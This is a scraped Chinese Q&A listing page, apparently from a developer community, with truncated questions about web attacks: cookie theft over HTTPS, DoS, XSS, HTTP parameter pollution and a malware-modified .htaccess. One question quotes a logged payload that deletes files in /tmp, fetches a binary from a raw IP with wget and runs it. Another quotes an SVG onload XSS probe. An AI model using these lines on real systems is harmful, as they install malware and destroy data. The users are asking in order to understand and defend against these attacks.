2回答
我的问题是,如果我以HTTPS连接托管我的网站,那么该cookie是否仍然可能被攻击者窃取,以便在中间攻击中执行man??那么HTTPS连接中是否还存在这种风险呢?或者如何使其更安全,使攻击者不能窃取cookie?
浏览 3提问于2021-08-23得票数 0
1回答
我想知道无限重定向可以被用作dos攻击。
如果我像http://mysite.com/test.php?url=http://mysite.com/test.php?url=http://mysite.com/test.php?url=http://mysite.com/test.php?这会导致dos攻击吗?
浏览 0提问于2019-08-02得票数 1
2回答
我正在阅读如何检测到格式错误的数据包,它说HTTP洪流攻击对SMTP服务器的攻击可以被过滤。
有人能向我解释一下SMTP和HTTP是如何分开的吗?我以为SMTP会以某种方式使用HTTP。
浏览 2提问于2017-05-09得票数 3
1回答
正如您可能听说过的,最近的许多DDoS攻击使用不同的放大方法来放大攻击的威力。例如,DNS放大是建立在DNS服务器可以为非常小的输入数据包生成巨大的输出数据包的思想之上的。那么,在HTTP上也是可能的吗?HTTP GET包非常小,而来自服务器的响应包含所请求页面上的所有HTML代码(当然,响应要大得多)。因此,为了放大,攻击者可以伪造他的IP地址,并发送许多HTTP请求。然后,HTTP响应将被发送到欺骗的IP地址。那么,HTTP是否被
浏览 5提问于2014-04-19得票数 0
1回答
攻击方案:被攻击的站点使用cookies (但没有Vary: Cookie HTTP头)发出请求,浏览器缓存响应,攻击站点发出相同的请求(但没有cookies,因为使用了Set-Cookie中的SameSite(__dirname + '/index.html'); console.log(`Example app listening at http://localh
浏览 4提问于2020-07-14得票数 2
cd+/tmp;rm+-rf+*;wget+ 45.14.224.220/jaws;sh+/tmp/jaws HTTP/1.1" 301 169 "-" "Hello, world"
93.157.62.102- - "GET / HTTP/1.1" 301 169 "http://[IP OF MY SERVER]:80/left.html" &qu
浏览 0提问于2020-07-09得票数 4
2回答
我的服务器上的站点正受到SQL注入的攻击。我阻止被命令攻击的IP:我现在可以回顾一下ATTACK-IP-ADDRESS的活动了吗?我的意思是什么时候和什么HTTP请求是从这个IP。
浏览 0提问于2020-06-26得票数 -1
基于DOM(类型0)的XSS不需要向服务器发送恶意代码,因此它们也可以使用静态HTML页面作为攻击载体。以下是虚拟攻击字符串的示例:我很熟悉,ModSecurity在PDF中提供了对被认为是0类攻击的XSS攻击的保护,但是我的问题是,ModSecurity是否在一般情况下防止这种类
浏览 0提问于2010-12-10得票数 3
2回答
嗯,我最近被DoS攻击了,我需要了解一些事情。s.send("Some sort of packet that would request the server to do 'work'")
浏览 7提问于2014-10-13得票数 0
这是我唯一能想到去的地方,所以我去了我的一个使用Cloudflare的服务器/网站,它没有工作,所以我想问这个社区的可爱的人们发生了什么事
浏览 7提问于2022-06-21得票数 -4
回答已采纳
如果使用HTTP的可信网站向HTTPS端点发出CORS请求,我是否应该担心?
提前感谢你的帮助。
浏览 3提问于2016-09-08得票数 1
回答已采纳
2回答
我知道xss攻击使用页面的输入点将javascript代码插入到页面或服务器db中。在这两种情况下,javascript代码将很快或稍后在某些事件上被激活。我想象一个攻击者使用浏览器使用输入名将javascript代码放入服务器db。另一个客户端(受害者)向同一台服务器发出请求,可能请求用户分类。攻击者处于分类状态,因此攻击者名称(实际上是邪恶的javascript代码)被插入到受害者请求的页面中。我想攻击</em
浏览 0提问于2015-03-27得票数 1
回答已采纳
1回答
可能是很基本的问题,但在读了类似的问题和答案后,我有点困惑,所以希望能有更多的澄清。示例: method=“post”> .....
浏览 0提问于2017-10-09得票数 1
4回答
我捕捉到了一些网络攻击。我试图了解每个攻击请求的目的是什么。
GET /site/public/timing?<sVg/OnLOaD=prompt(14721850.00307)>
浏览 0提问于2016-08-29得票数 26
1回答
HTTP参数污染攻击
、、、、
反射(HPP)是一个注入弱点漏洞,攻击者可以插入分隔符并更改应用程序生成的参数。攻击的后果取决于应用程序的功能,但可能包括访问和潜在地利用不可控制的变量,进行其他攻击,如跨站点请求伪造,或以意外的方式更改应用程序行为。
浏览 2提问于2016-06-15得票数 0
我的网站最近受到了恶意软件感染的攻击。在添加的几个php文件中,我的.htaccess也被修改了。通常,它只写index options,但攻击者将其更改为如下:RewriteRule ^6334437290/(.*)$ dita-cymbal.php [QSA,-dRewriteCond %{HTTP_REFERER} (goog
浏览 5提问于2017-01-29得票数 0
回答已采纳
1回答
我的服务器受到HTTP POST攻击,我希望将所有这些请求发送到403,而不是让它们被mod_security捕获,以便提高拒绝速度并减轻Apache的一些负担。下面是我现在正在使用的:RewriteCond %{HTTP_HOST} !^http://(www\.)?
浏览 4提问于2012-08-03得票数 1
回答已采纳
扫码
添加站长 进交流群
领取专属 10元无门槛券
手把手带您无忧上云
相关资讯
热门标签
云服务器
ICP备案
腾讯会议
对象存储
云直播活动推荐
腾讯云开发者
